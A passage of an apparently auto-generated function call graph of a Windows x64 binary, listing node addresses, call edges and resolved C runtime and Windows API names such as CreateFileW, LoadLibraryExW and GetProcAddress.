7ff73af41e0c 76353->76368 76354 7ff73af34fee GetLastError 76357 7ff73af2ae88 wcsftime 14 API calls 76354->76357 76355->76360 76356 7ff73af3a290 wcsftime 15 API calls 76356->76353 76361 7ff73af34ffb 76357->76361 76358->76354 76359 7ff73af35027 76358->76359 76362 7ff73af3501b 76358->76362 76366 7ff73af39294 __free_lconv_mon 14 API calls 76358->76366 76359->76353 76363 7ff73af42ff4 wcsftime MultiByteToWideChar 76359->76363 76360->76356 76365 7ff73af2aef8 _get_daylight 14 API calls 76361->76365 76367 7ff73af3a290 wcsftime 15 API calls 76362->76367 76364 7ff73af3506f 76363->76364 76364->76353 76364->76354 76365->76353 76366->76362 76367->76359 76369 7ff73af419f0 tmpfile 23 API calls 76368->76369 76370 7ff73af41e53 76369->76370 76371 7ff73af41e99 76370->76371 76372 7ff73af41e81 76370->76372 76374 7ff73af479a0 tmpfile 18 API calls 76371->76374 76373 7ff73af2aed8 tmpfile 14 API calls 76372->76373 76375 7ff73af41e86 76373->76375 76376 7ff73af41e9e 76374->76376 76381 7ff73af2aef8 _get_daylight 14 API calls 76375->76381 76377 7ff73af41ebe CreateFileW 76376->76377 76378 7ff73af41ea5 76376->76378 76379 7ff73af41f29 76377->76379 76380 7ff73af41fa4 GetFileType 76377->76380 76382 7ff73af2aed8 tmpfile 14 API calls 76378->76382 76383 7ff73af41f71 GetLastError 76379->76383 76388 7ff73af41f37 CreateFileW 76379->76388 76385 7ff73af42002 76380->76385 76386 7ff73af41fb1 GetLastError 76380->76386 76384 7ff73af41e92 76381->76384 76387 7ff73af41eaa 76382->76387 76389 7ff73af2ae88 wcsftime 14 API calls 76383->76389 76384->76332 76393 7ff73af478b8 tmpfile 15 API calls 76385->76393 76390 7ff73af2ae88 wcsftime 14 API calls 76386->76390 76391 7ff73af2aef8 _get_daylight 14 API calls 76387->76391 76388->76380 76388->76383 76389->76375 76392 7ff73af41fc0 CloseHandle 76390->76392 76391->76375 76392->76375 76394 7ff73af41ff2 76392->76394 76395 7ff73af42024 76393->76395 76396 7ff73af2aef8 _get_daylight 14 API calls 76394->76396 76397 7ff73af42074 76395->76397 76399 7ff73af41bfc tmpfile 62 API calls 76395->76399 76398 7ff73af41ff7 76396->76398 76400 7ff73af4175c tmpfile 62 API calls 76397->76400 76402 7ff73af4207b 76397->76402 76398->76375 76399->76397 76401 7ff73af420b2 76400->76401 76401->76402 76403 7ff73af420bc 76401->76403 76404 7ff73af3d5d8 tmpfile 26 API calls 76402->76404 76403->76384 76405 7ff73af4213c CloseHandle CreateFileW 76403->76405 76404->76384 76406 7ff73af421b1 76405->76406 76407 7ff73af42183 GetLastError 76405->76407 76406->76384 76408 7ff73af2ae88 wcsftime 14 API calls 76407->76408 76409 7ff73af42190 76408->76409 76410 7ff73af47ae0 tmpfile 15 API calls 76409->76410 76410->76406 76411->76329 76412->76334 76428 7ff73ae74490 76413->76428 76442 7ff73ae6b3d0 76413->76442 76447 7ff73ae864e4 76413->76447 76414 7ff73ae62fd8 76415 7ff73ae62ddf 76414->76415 76452 7ff73ae80f90 15 API calls 2 library calls 76414->76452 76421 7ff73ae873c0 76415->76421 76417 7ff73ae62420 76655 7ff73ae86f90 76421->76655 76424 7ff73ae86f90 _mbsncpy_s 10 API calls 76425 7ff73ae8742c 76424->76425 76658 7ff73ae87010 76425->76658 76453 7ff73ae87170 76428->76453 76430 7ff73ae7456d 76431 7ff73ae74585 76430->76431 76432 7ff73ae74574 76430->76432 76482 7ff73ae96200 91 API calls 5 library calls 76431->76482 76466 7ff73ae94c00 76432->76466 76435 7ff73ae744cf _free_nolock 76435->76430 76480 7ff73ae705a0 15 API calls 2 library calls 76435->76480 76436 7ff73ae7457e 76483 7ff73ae7eae0 15 API calls 76436->76483 76438 7ff73ae745b6 76438->76414 76440 7ff73ae7454c 76481 7ff73ae70600 5 API calls _free_nolock 76440->76481 76538 7ff73ae78450 76442->76538 76566 7ff73aeca950 76447->76566 76449 7ff73ae86505 76592 7ff73ae85590 76449->76592 76451 7ff73ae8650f 76451->76414 76452->76417 76484 7ff73ae877f0 76453->76484 76455 7ff73ae877f0 _wcsupr_s 54 API calls 76462 7ff73ae872d0 76455->76462 76456 7ff73ae8731f 76458 7ff73ae872f8 76456->76458 76489 7ff73ae705a0 15 API calls 2 library calls 76456->76489 76458->76435 76460 7ff73ae877f0 _wcsupr_s 54 API calls 76460->76462 76461 7ff73ae8737f _wcsupr_s 76490 7ff73ae70600 5 API calls _free_nolock 76461->76490 76462->76455 76462->76456 76462->76458 76463 7ff73ae87315 76462->76463 76488 7ff73ae878c0 54 API calls _wcsupr_s 76463->76488 76467 7ff73ae94c45 76466->76467 76496 7ff73ae95c90 76467->76496 76472 7ff73ae94c90 76473 7ff73ae94dd5 76472->76473 76525 7ff73ae94e10 15 API calls 2 library calls 76472->76525 76473->76436 76474 7ff73ae94c62 76474->76472 76508 7ff73ae951c0 76474->76508 76512 7ff73ae95170 76474->76512 76516 7ff73ae94840 76474->76516 76523 7ff73ae94e10 15 API calls 2 library calls 76474->76523 76524 7ff73ae6ad60 15 API calls _free_nolock 76474->76524 76480->76440 76481->76430 76482->76436 76483->76438 76485 7ff73ae87250 76484->76485 76486 7ff73ae87834 76484->76486 76485->76460 76485->76462 76491 7ff73ae87700 76486->76491 76488->76456 76489->76461 76490->76458 76495 7ff73ae74600 39 API calls 76491->76495 76492 7ff73ae8773d 76492->76485 76493 7ff73ae87728 76493->76492 76494 7ff73ae70690 _free_nolock 15 API calls 76493->76494 76494->76492 76495->76493 76497 7ff73ae951c0 54 API calls 76496->76497 76500 7ff73ae95ca8 76497->76500 76498 7ff73ae94c4f 76498->76474 76522 7ff73ae94e10 15 API calls 2 library calls 76498->76522 76499 7ff73ae95d8b 76501 7ff73ae95dcf 76499->76501 76502 7ff73ae95d96 strrchr 76499->76502 76500->76498 76500->76499 76526 7ff73aeae570 15 API calls 3 library calls 76500->76526 76505 7ff73ae95170 54 API calls 76501->76505 76504 7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 76502->76504 76504->76498 76506 7ff73ae95deb 76505->76506 76507 7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 76506->76507 76507->76498 76509 7ff73ae951e8 76508->76509 76510 7ff73ae951f9 76508->76510 76527 7ff73ae94ed0 76509->76527 76510->76474 76513 7ff73ae95198 76512->76513 76514 7ff73ae951ac 76512->76514 76515 7ff73ae94ed0 54 API calls 76513->76515 76514->76474 76515->76514 76518 7ff73ae9486e 76516->76518 76517 7ff73ae78da0 task 15 API calls 76519 7ff73ae949ac 76517->76519 76518->76517 76537 7ff73ae95790 15 API calls type_info::_name_internal_method 76519->76537 76521 7ff73ae94ad7 76521->76474 76522->76474 76523->76474 76524->76474 76525->76473 76526->76500 76528 7ff73ae94eec 76527->76528 76529 7ff73ae94e10 15 API calls 76528->76529 76535 7ff73ae94f06 memcpy_s 76528->76535 76529->76535 76530 7ff73ae94790 15 API calls 76530->76535 76531 7ff73ae95023 76532 7ff73ae95039 76531->76532 76533 7ff73ae94e10 15 API calls 76531->76533 76532->76510 76533->76532 76534 7ff73ae70690 _free_nolock 15 API calls 76534->76535 76535->76530 76535->76531 76535->76532 76535->76534 76536 7ff73ae74600 39 API calls 76535->76536 76536->76535 76537->76521 76539 7ff73ae6b3ed 76538->76539 76540 7ff73ae78484 76538->76540 76542 7ff73ae78420 76539->76542 76540->76539 76546 7ff73ae7a690 76540->76546 76543 7ff73ae78429 76542->76543 76544 7ff73ae6b3f7 76543->76544 76556 7ff73ae7a850 76543->76556 76544->76414 76547 7ff73ae7a707 76546->76547 76552 7ff73ae62f8a 76547->76552 76553 7ff73ae62fab 76552->76553 76554 7ff73ae80f90 strrchr 15 API calls 76553->76554 76555 7ff73ae62420 76554->76555 76557 7ff73ae7a888 76556->76557 76558 7ff73ae7a8bd 76557->76558 76559 7ff73ae7a9a3 wcsxfrm 76557->76559 76565 7ff73ae7d720 15 API calls 3 library calls 76558->76565 76560 7ff73ae7a99e 76559->76560 76562 7ff73ae7a690 15 API calls 76559->76562 76560->76543 76562->76560 76563 7ff73ae7a94c 76563->76560 76564 7ff73ae7a690 15 API calls 76563->76564 76564->76560 76565->76563 76567 7ff73aeca9b7 76566->76567 76567->76567 76602 7ff73aeca900 76567->76602 76569 7ff73aecaa15 76606 7ff73ae837c0 76569->76606 76571 7ff73aecaa87 76609 7ff73aebaa20 76571->76609 76577 7ff73aecf750 5 API calls 76586 7ff73aecabb7 76577->76586 76578 7ff73aecb460 18 API calls 76578->76586 76579 7ff73aecf660 18 API calls 76579->76586 76585 7ff73aecaebf memcpy_s 76632 7ff73aecf750 76585->76632 76586->76577 76586->76578 76586->76579 76586->76585 76588 7ff73ae837c0 15 API calls 76586->76588 76618 7ff73aede3a0 76586->76618 76622 7ff73aece150 76586->76622 76628 7ff73aed21b0 76586->76628 76636 7ff73aede040 18 API calls 76586->76636 76637 7ff73aedcc10 RtlCaptureContext RtlLookupFunctionEntry RtlRestoreContext RtlVirtualUnwind RaiseException 76586->76637 76638 7ff73aed04a0 18 API calls 76586->76638 76639 7ff73aedd4f0 18 API calls 2 library calls 76586->76639 76588->76586 76591 7ff73aecaff8 _handle_error 76591->76449 76593 7ff73ae85611 76592->76593 76594 7ff73aebaa90 16 API calls 76593->76594 76596 7ff73ae8583b 76594->76596 76595 7ff73ae8597e 76595->76451 76596->76595 76653 7ff73aedee70 15 API calls 2 library calls 76596->76653 76598 7ff73ae8589d 76598->76595 76599 7ff73ae7b7a0 type_info::_name_internal_method 15 API calls 76598->76599 76600 7ff73ae858e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76599->76600 76654 7ff73aedf070 73 API calls _wcsupr_s 76600->76654 76603 7ff73aeca926 76602->76603 76604 7ff73aeca930 76602->76604 76641 7ff73aee5d90 15 API calls _free_nolock 76603->76641 76604->76569 76607 7ff73ae78d00 _free_nolock 15 API calls 76606->76607 76608 7ff73ae8383b memcpy_s 76607->76608 76608->76571 76610 7ff73aebaa49 76609->76610 76611 7ff73aebaa3d 76609->76611 76613 7ff73aebaee0 16 API calls 76610->76613 76642 7ff73aebb0e0 76611->76642 76614 7ff73aebaa47 76613->76614 76615 7ff73aedc660 76614->76615 76645 7ff73aed2a10 18 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76615->76645 76617 7ff73aedc685 76617->76586 76619 7ff73aede3e6 76618->76619 76621 7ff73aede5dd 76619->76621 76646 7ff73ae836b0 5 API calls 2 library calls 76619->76646 76621->76586 76625 7ff73aece16f 76622->76625 76623 7ff73aece273 76623->76586 76624 7ff73aece1e6 76624->76623 76627 7ff73aecb460 18 API calls 76624->76627 76625->76624 76647 7ff73aecb460 76625->76647 76627->76624 76630 7ff73aed21c8 type_info::_name_internal_method 76628->76630 76629 7ff73aed2291 76629->76586 76630->76629 76651 7ff73aece540 15 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76630->76651 76633 7ff73aecf775 76632->76633 76635 7ff73aecaf63 76632->76635 76633->76635 76652 7ff73ae836b0 5 API calls 2 library calls 76633->76652 76635->76591 76640 7ff73ae836b0 5 API calls 2 library calls 76635->76640 76636->76586 76637->76586 76638->76586 76639->76586 76640->76591 76641->76604 76643 7ff73aebaf50 7 API calls 76642->76643 76644 7ff73aebb13e 76643->76644 76644->76614 76645->76617 76646->76621 76648 7ff73aecb483 76647->76648 76649 7ff73aecb48d 76647->76649 76650 7ff73aecb410 18 API calls 76648->76650 76649->76625 76650->76649 76651->76630 76652->76635 76653->76598 76654->76595 76657 7ff73ae88b40 10 API calls 76655->76657 76656 7ff73ae86fda 76656->76424 76657->76656 76659 7ff73ae86f90 _mbsncpy_s 10 API calls 76658->76659 76660 7ff73ae8704b 76659->76660 76660->76256 76661->76262 76663->76273 76666 7ff73ae7f707 wcsxfrm 76664->76666 76667 7ff73ae7f81e 76666->76667 76670 7ff73ae7f727 wcsxfrm 76666->76670 76673 7ff73ae70a70 15 API calls 2 library calls 76667->76673 76669 7ff73ae7f7f0 wcsxfrm 76669->76180 76670->76669 76674 7ff73ae70950 15 API calls strrchr 76670->76674 76672->76183 76673->76669 76674->76669 76676 7ff73af2a9a4 76675->76676 76691 7ff73af2aa57 memcpy_s 76675->76691 76677 7ff73af2aa67 76676->76677 76679 7ff73af2a9bb 76676->76679 76683 7ff73af3ab1c _get_daylight 14 API calls 76677->76683 76677->76691 76678 7ff73af2aef8 _get_daylight 14 API calls 76680 7ff73ae65487 76678->76680 76697 7ff73af391ac EnterCriticalSection 76679->76697 76693 7ff73ae6dd30 76680->76693 76684 7ff73af2aa83 76683->76684 76684->76691 76698 7ff73af3a290 76684->76698 76691->76678 76691->76680 76694 7ff73ae6dd6f wcsxfrm 76693->76694 76695 7ff73ae62f8a 15 API calls 76694->76695 76696 7ff73ae654b8 76695->76696 76696->76193 76699 7ff73af3a2db 76698->76699 76700 7ff73af3a29f wcsftime 76698->76700 76701 7ff73af2aef8 _get_daylight 14 API calls 76699->76701 76700->76699 76702 7ff73af3a2c2 HeapAlloc 76700->76702 76706 7ff73af4addc EnterCriticalSection LeaveCriticalSection wcsftime 76700->76706 76704 7ff73af3a2e0 76701->76704 76702->76700 76703 7ff73af3a2d9 76702->76703 76703->76704 76704->76691 76706->76700 76707->76200 76708->76202 76710->76084 76711->76089 76713 7ff73ae78d00 _free_nolock 15 API calls 76712->76713 76714 7ff73ae6ad2f 76713->76714 76714->75905 76716 7ff73ae70950 15 API calls strrchr 76714->76716 76715->75902 76716->75905 76718 7ff73ae73d67 76717->76718 76720 7ff73ae73cbf 76717->76720 76730 7ff73ae72320 15 API calls _free_nolock 76718->76730 76729 7ff73ae72320 15 API calls _free_nolock 76720->76729 76722 7ff73ae7310f 76722->75912 76722->75913 76725 7ff73ae84020 76723->76725 76724 7ff73ae63037 _mbsncpy_s 94 API calls 76724->76725 76725->76724 76726 7ff73ae84089 76725->76726 76726->75915 76727->75917 76728->75917 76729->76722 76730->76722 76731 7ff73ae64a97 76732 7ff73ae64aa7 76731->76732 76733 7ff73ae730a0 102 API calls 76732->76733 76734 7ff73ae64ac4 76733->76734 76735 7ff73af2ac60 76736 7ff73af2acc7 76735->76736 76737 7ff73af2ac7d GetModuleHandleW 76735->76737 76745 7ff73af2ab58 76736->76745 76737->76736 76743 7ff73af2ac8a 76737->76743 76740 7ff73af2ad09 76742 7ff73af2ad1b 76743->76736 76759 7ff73af2ad68 GetModuleHandleExW 76743->76759 76765 7ff73af391ac EnterCriticalSection 76745->76765 76747 7ff73af2ab74 76748 7ff73af2ab90 14 API calls 76747->76748 76749 7ff73af2ab7d 76748->76749 76750 7ff73af39200 _isindst LeaveCriticalSection 76749->76750 76751 7ff73af2ab85 76750->76751 76751->76740 76752 7ff73af2ad1c 76751->76752 76766 7ff73af3d484 76752->76766 76755 7ff73af2ad56 76757 7ff73af2ad68 3 API calls 76755->76757 76756 7ff73af2ad45 GetCurrentProcess TerminateProcess 76756->76755 76758 7ff73af2ad5d ExitProcess 76757->76758 76760 7ff73af2adad 76759->76760 76761 7ff73af2ad8e GetProcAddress 76759->76761 76763 7ff73af2adb7 FreeLibrary 76760->76763 76764 7ff73af2adbd 76760->76764 76761->76760 76762 7ff73af2ada5 76761->76762 76762->76760 76763->76764 76764->76736 76767 7ff73af3d4a2 76766->76767 76768 7ff73af2ad29 76766->76768 76770 7ff73af39550 76767->76770 76768->76755 76768->76756 76773 7ff73af39378 76770->76773 76774 7ff73af393d9 76773->76774 76780 7ff73af393d4 try_get_function 76773->76780 76774->76768 76775 7ff73af394bc 76775->76774 76778 7ff73af394ca GetProcAddress 76775->76778 76776 7ff73af39408 LoadLibraryW 76777 7ff73af39429 GetLastError 76776->76777 76776->76780 76777->76780 76779 7ff73af394db 76778->76779 76779->76774 76780->76774 76780->76775 76780->76776 76781 7ff73af394a1 FreeLibrary 76780->76781 76782 7ff73af39463 LoadLibraryExW 76780->76782 76781->76780 76782->76780 76783 7ff73ae61cf0 76786 7ff73ae7ebc0 76783->76786 76787 7ff73ae7ebef 76786->76787 76792 7ff73ae7efd0 76787->76792 76789 7ff73ae61d19 76791 7ff73ae7ec11 76791->76789 76795 7ff73ae7edf0 76791->76795 76793 7ff73ae78da0 task 15 API calls 76792->76793 76794 7ff73ae7f001 76793->76794 76794->76791 76796 7ff73ae7ee1a 76795->76796 76797 7ff73ae78d00 _free_nolock 15 API calls 76796->76797 76798 7ff73ae7ee52 76796->76798 76797->76798 76798->76791 76799 7ff73af0d4e4 76824 7ff73af0d6a8 76799->76824 76802 7ff73af0d630 76852 7ff73af0d9d4 7 API calls 2 library calls 76802->76852 76803 7ff73af0d500 __scrt_acquire_startup_lock 76805 7ff73af0d63a 76803->76805 76806 7ff73af0d51e 76803->76806 76853 7ff73af0d9d4 7 API calls 2 library calls 76805->76853 76815 7ff73af0d53f __scrt_release_startup_lock 76806->76815 76832 7ff73af3675c 76806->76832 76809 7ff73af0d543 76810 7ff73af0d645 ExFilterRethrow _free_nolock 76811 7ff73af0d5c9 76837 7ff73af0db20 76811->76837 76813 7ff73af0d5ce 76840 7ff73af36688 76813->76840 76815->76809 76815->76811 76849 7ff73af2adf8 26 API calls 76815->76849 76821 7ff73af0d5f1 76821->76810 76851 7ff73af0d83c 7 API calls __scrt_initialize_crt 76821->76851 76823 7ff73af0d608 76823->76809 76854 7ff73af0dc9c 76824->76854 76827 7ff73af0d6d7 76856 7ff73af38760 76827->76856 76828 7ff73af0d4f8 76828->76802 76828->76803 76834 7ff73af3676f 76832->76834 76833 7ff73af3678c 76833->76815 76834->76833 77034 7ff73af11ae8 76834->77034 77046 7ff73af0d400 76834->77046 77132 7ff73af0e110 76837->77132 76841 7ff73af4695c 37 API calls 76840->76841 76842 7ff73af36697 76841->76842 76844 7ff73af0d5d6 76842->76844 77134 7ff73af46c94 26 API calls TranslateName 76842->77134 76845 7ff73ae650e0 76844->76845 76846 7ff73ae650fd 76845->76846 77135 7ff73ae66b70 76846->77135 76849->76811 76850 7ff73af0db64 GetModuleHandleW 76850->76821 76851->76823 76852->76805 76853->76810 76855 7ff73af0d6ca __scrt_dllmain_crt_thread_attach 76854->76855 76855->76827 76855->76828 76857 7ff73af4ad18 76856->76857 76858 7ff73af0d6dc 76857->76858 76862 7ff73af4695c 76857->76862 76868 7ff73af468a4 76857->76868 76858->76828 76861 7ff73af0f154 7 API calls 2 library calls 76858->76861 76861->76828 76863 7ff73af46969 76862->76863 76867 7ff73af469ae 76862->76867 76883 7ff73af3aa74 76863->76883 76867->76857 76869 7ff73af468c7 76868->76869 76870 7ff73af468d1 76869->76870 77033 7ff73af391ac EnterCriticalSection 76869->77033 76873 7ff73af46943 76870->76873 76875 7ff73af387cc ExFilterRethrow 26 API calls 76870->76875 76873->76857 76877 7ff73af4695b 76875->76877 76878 7ff73af469ae 76877->76878 76880 7ff73af3aa74 26 API calls 76877->76880 76878->76857 76881 7ff73af46998 76880->76881 76882 7ff73af466e4 37 API calls 76881->76882 76882->76878 76884 7ff73af3aa8a 76883->76884 76885 7ff73af3aa85 76883->76885 76891 7ff73af3aa92 76884->76891 76927 7ff73af39828 6 API calls try_get_function 76884->76927 76926 7ff73af397e0 6 API calls try_get_function 76885->76926 76888 7ff73af3aaa9 76889 7ff73af3921c _wcsupr_s 14 API calls 76888->76889 76888->76891 76892 7ff73af3aabc 76889->76892 76896 7ff73af3ab0c 76891->76896 76934 7ff73af387cc 76891->76934 76894 7ff73af3aada 76892->76894 76895 7ff73af3aaca 76892->76895 76930 7ff73af39828 6 API calls try_get_function 76894->76930 76928 7ff73af39828 6 API calls try_get_function 76895->76928 76908 7ff73af466e4 76896->76908 76899 7ff73af3aad1 76929 7ff73af39294 14 API calls 2 library calls 76899->76929 76900 7ff73af3aae2 76901 7ff73af3aaf8 76900->76901 76902 7ff73af3aae6 76900->76902 76932 7ff73af3a750 14 API calls _get_daylight 76901->76932 76931 7ff73af39828 6 API calls try_get_function 76902->76931 76906 7ff73af3ab00 76933 7ff73af39294 14 API calls 2 library calls 76906->76933 76909 7ff73af468a4 37 API calls 76908->76909 76910 7ff73af4670d 76909->76910 76946 7ff73af463f0 76910->76946 76913 7ff73af46727 76913->76867 76914 7ff73af3a290 wcsftime 15 API calls 76917 7ff73af46738 76914->76917 76915 7ff73af467d3 76962 7ff73af39294 14 API calls 2 library calls 76915->76962 76917->76915 76953 7ff73af469d8 76917->76953 76919 7ff73af467c7 76920 7ff73af467ce 76919->76920 76923 7ff73af467f3 76919->76923 76921 7ff73af2aef8 _get_daylight 14 API calls 76920->76921 76921->76915 76922 7ff73af46830 76922->76915 76964 7ff73af46234 23 API calls 5 library calls 76922->76964 76923->76922 76963 7ff73af39294 14 API calls 2 library calls 76923->76963 76927->76888 76928->76899 76929->76891 76930->76900 76931->76899 76932->76906 76933->76891 76943 7ff73af2a6c0 EnterCriticalSection LeaveCriticalSection ExFilterRethrow 76934->76943 76936 7ff73af387d5 76937 7ff73af387e4 76936->76937 76944 7ff73af2a710 26 API calls 5 library calls 76936->76944 76939 7ff73af387ed IsProcessorFeaturePresent 76937->76939 76941 7ff73af38817 ExFilterRethrow 76937->76941 76940 7ff73af387fc 76939->76940 76945 7ff73af38900 6 API calls 3 library calls 76940->76945 76943->76936 76944->76937 76945->76941 76947 7ff73af13ea8 TranslateName 26 API calls 76946->76947 76948 7ff73af46404 76947->76948 76949 7ff73af46422 76948->76949 76950 7ff73af46410 GetOEMCP 76948->76950 76951 7ff73af46437 76949->76951 76952 7ff73af46427 GetACP 76949->76952 76950->76951 76951->76913 76951->76914 76952->76951 76954 7ff73af463f0 28 API calls 76953->76954 76955 7ff73af46a03 76954->76955 76956 7ff73af46a40 IsValidCodePage 76955->76956 76957 7ff73af46a83 memcpy_s _handle_error 76955->76957 76956->76957 76958 7ff73af46a51 76956->76958 76957->76919 76959 7ff73af46a88 GetCPInfo 76958->76959 76961 7ff73af46a5a memcpy_s 76958->76961 76959->76957 76959->76961 76965 7ff73af46500 76961->76965 76962->76913 76963->76922 76964->76915 76966 7ff73af4653d GetCPInfo 76965->76966 76968 7ff73af46633 _handle_error 76965->76968 76967 7ff73af46550 76966->76967 76966->76968 76974 7ff73af492ec 76967->76974 76968->76957 76970 7ff73af465c7 76987 7ff73af4e6ec 76970->76987 76973 7ff73af4e6ec 31 API calls 76973->76968 76975 7ff73af13ea8 TranslateName 26 API calls 76974->76975 76976 7ff73af4932e 76975->76976 76992 7ff73af42ff4 76976->76992 76978 7ff73af4936b _handle_error 76978->76970 76979 7ff73af49364 76979->76978 76980 7ff73af3a290 wcsftime 15 API calls 76979->76980 76982 7ff73af49390 memcpy_s wcsftime 76979->76982 76980->76982 76981 7ff73af49428 76981->76978 76984 7ff73af39294 __free_lconv_mon 14 API calls 76981->76984 76982->76981 76983 7ff73af42ff4 wcsftime MultiByteToWideChar 76982->76983 76985 7ff73af4940a 76983->76985 76984->76978 76985->76981 76986 7ff73af4940e GetStringTypeW 76985->76986 76986->76981 76988 7ff73af13ea8 TranslateName 26 API calls 76987->76988 76989 7ff73af4e711 76988->76989 76995 7ff73af4e3d4 76989->76995 76991 7ff73af465fa 76991->76973 76993 7ff73af42ffc MultiByteToWideChar 76992->76993 76996 7ff73af4e416 76995->76996 76997 7ff73af42ff4 wcsftime MultiByteToWideChar 76996->76997 76999 7ff73af4e460 76997->76999 76998 7ff73af4e69f _handle_error 76998->76991 76999->76998 77000 7ff73af3a290 wcsftime 15 API calls 76999->77000 77002 7ff73af4e493 wcsftime 76999->77002 77000->77002 77001 7ff73af42ff4 wcsftime MultiByteToWideChar 77003 7ff73af4e505 77001->77003 77002->77001 77004 7ff73af4e597 77002->77004 77003->77004 77021 7ff73af39bf4 77003->77021 77004->76998 77031 7ff73af39294 14 API calls 2 library calls 77004->77031 77008 7ff73af4e554 77008->77004 77011 7ff73af39bf4 __crtLCMapStringW 7 API calls 77008->77011 77009 7ff73af4e5a6 77010 7ff73af3a290 wcsftime 15 API calls 77009->77010 77013 7ff73af4e5c0 wcsftime 77009->77013 77010->77013 77011->77004 77012 7ff73af39bf4 __crtLCMapStringW 7 API calls 77016 7ff73af4e641 77012->77016 77013->77004 77013->77012 77014 7ff73af4e676 77014->77004 77030 7ff73af39294 14 API calls 2 library calls 77014->77030 77016->77014 77029 7ff73af43050 WideCharToMultiByte 77016->77029 77022 7ff73af39378 try_get_function 5 API calls 77021->77022 77023 7ff73af39c32 77022->77023 77024 7ff73af39c89 77023->77024 77025 7ff73af39c37 LCMapStringEx 77023->77025 77032 7ff73af39cd0 5 API calls 2 library calls 77024->77032 77026 7ff73af39cbb 77025->77026 77026->77004 77026->77008 77026->77009 77028 7ff73af39c93 LCMapStringW 77028->77026 77030->77004 77031->76998 77032->77028 77035 7ff73af11b12 77034->77035 77036 7ff73af3921c _wcsupr_s 14 API calls 77035->77036 77037 7ff73af11b31 77036->77037 77063 7ff73af39294 14 API calls 2 library calls 77037->77063 77039 7ff73af11b3f 77040 7ff73af3921c _wcsupr_s 14 API calls 77039->77040 77044 7ff73af11b69 77039->77044 77041 7ff73af11b5b 77040->77041 77064 7ff73af39294 14 API calls 2 library calls 77041->77064 77045 7ff73af11b72 77044->77045 77065 7ff73af39ac8 6 API calls try_get_function 77044->77065 77045->76834 77047 7ff73af0d410 77046->77047 77066 7ff73af367cc 77047->77066 77049 7ff73af0d41c 77072 7ff73af0d6f4 77049->77072 77052 7ff73af0d434 _RTC_Initialize 77061 7ff73af0d489 77052->77061 77077 7ff73af0d8a4 77052->77077 77053 7ff73af0d4b5 77053->76834 77055 7ff73af0d449 77080 7ff73af35f54 77055->77080 77059 7ff73af0d45e 77060 7ff73af36e98 26 API calls 77059->77060 77060->77061 77062 7ff73af0d4a5 77061->77062 77114 7ff73af0d9d4 7 API calls 2 library calls 77061->77114 77062->76834 77063->77039 77064->77044 77065->77044 77067 7ff73af367dd 77066->77067 77068 7ff73af2aef8 _get_daylight 14 API calls 77067->77068 77069 7ff73af367e5 77067->77069 77070 7ff73af367f4 77068->77070 77069->77049 77115 7ff73af38b14 23 API calls _invalid_parameter_noinfo 77070->77115 77073 7ff73af0d705 77072->77073 77076 7ff73af0d70a __scrt_release_startup_lock 77072->77076 77073->77076 77116 7ff73af0d9d4 7 API calls 2 library calls 77073->77116 77075 7ff73af0d77e 77076->77052 77117 7ff73af0d868 77077->77117 77079 7ff73af0d8ad 77079->77055 77081 7ff73af0d455 77080->77081 77082 7ff73af35f74 77080->77082 77081->77061 77113 7ff73af0d97c InitializeSListHead 77081->77113 77083 7ff73af35f7c 77082->77083 77084 7ff73af35f92 77082->77084 77085 7ff73af2aef8 _get_daylight 14 API calls 77083->77085 77086 7ff73af4695c 37 API calls 77084->77086 77087 7ff73af35f81 77085->77087 77088 7ff73af35f97 77086->77088 77122 7ff73af38b14 23 API calls _invalid_parameter_noinfo 77087->77122 77123 7ff73af46114 30 API calls 4 library calls 77088->77123 77091 7ff73af35fae 77124 7ff73af35d34 26 API calls 77091->77124 77093 7ff73af35feb 77125 7ff73af35ef4 14 API calls 2 library calls 77093->77125 77095 7ff73af36001 77096 7ff73af36009 77095->77096 77097 7ff73af36021 77095->77097 77098 7ff73af2aef8 _get_daylight 14 API calls 77096->77098 77127 7ff73af35d34 26 API calls 77097->77127 77100 7ff73af3600e 77098->77100 77126 7ff73af39294 14 API calls 2 library calls 77100->77126 77102 7ff73af36043 77131 7ff73af39294 14 API calls 2 library calls 77102->77131 77103 7ff73af3601c 77103->77081 77104 7ff73af3603d 77104->77102 77106 7ff73af36088 77104->77106 77107 7ff73af3606f 77104->77107 77130 7ff73af39294 14 API calls 2 library calls 77106->77130 77128 7ff73af39294 14 API calls 2 library calls 77107->77128 77109 7ff73af36078 77129 7ff73af39294 14 API calls 2 library calls 77109->77129 77112 7ff73af36084 77112->77081 77114->77053 77115->77069 77116->77075 77118 7ff73af0d882 77117->77118 77120 7ff73af0d87b 77117->77120 77121 7ff73af385ec 26 API calls 77118->77121 77120->77079 77121->77120 77122->77081 77123->77091 77124->77093 77125->77095 77126->77103 77127->77104 77128->77109 77129->77112 77130->77102 77131->77081 77133 7ff73af0db37 GetStartupInfoW 77132->77133 77133->76813 77134->76842 77136 7ff73ae66b92 77135->77136 77148 7ff73ae74a00 77136->77148 77139 7ff73ae66bee 77161 7ff73ae65250 60 API calls _wcsupr_s 77139->77161 77140 7ff73ae66c01 77151 7ff73ae6de20 77140->77151 77144 7ff73ae65300 75 API calls 77145 7ff73ae66c3d 77144->77145 77154 7ff73ae6a810 77145->77154 77147 7ff73ae65116 77147->76850 77162 7ff73ae6a530 77148->77162 77150 7ff73ae66be1 77150->77139 77150->77140 77152 7ff73ae63037 _mbsncpy_s 94 API calls 77151->77152 77153 7ff73ae66c2b 77152->77153 77153->77144 77203 7ff73ae8e2c0 77154->77203 77156 7ff73ae63037 _mbsncpy_s 94 API calls 77158 7ff73ae6a842 77156->77158 77157 7ff73ae6a937 77159 7ff73ae6b260 6 API calls 77157->77159 77158->77156 77158->77157 77160 7ff73ae6a965 77159->77160 77160->77147 77161->77147 77171 7ff73ae86950 77162->77171 77164 7ff73ae6a559 77166 7ff73ae6a55d _handle_error 77164->77166 77167 7ff73ae6a57c memcpy_s 77164->77167 77175 7ff73ae88930 77164->77175 77166->77150 77167->77166 77168 7ff73ae63037 _mbsncpy_s 94 API calls 77167->77168 77169 7ff73ae6a7cb 77168->77169 77169->77166 77178 7ff73ae6b260 77169->77178 77172 7ff73ae86963 LoadLibraryExA 77171->77172 77174 7ff73ae86982 Concurrency::details::_UnrealizedChore::_CancelViaToken 77171->77174 77173 7ff73ae86986 GetProcAddressForCaller 77172->77173 77172->77174 77173->77174 77174->77164 77176 7ff73ae88bb0 3 API calls 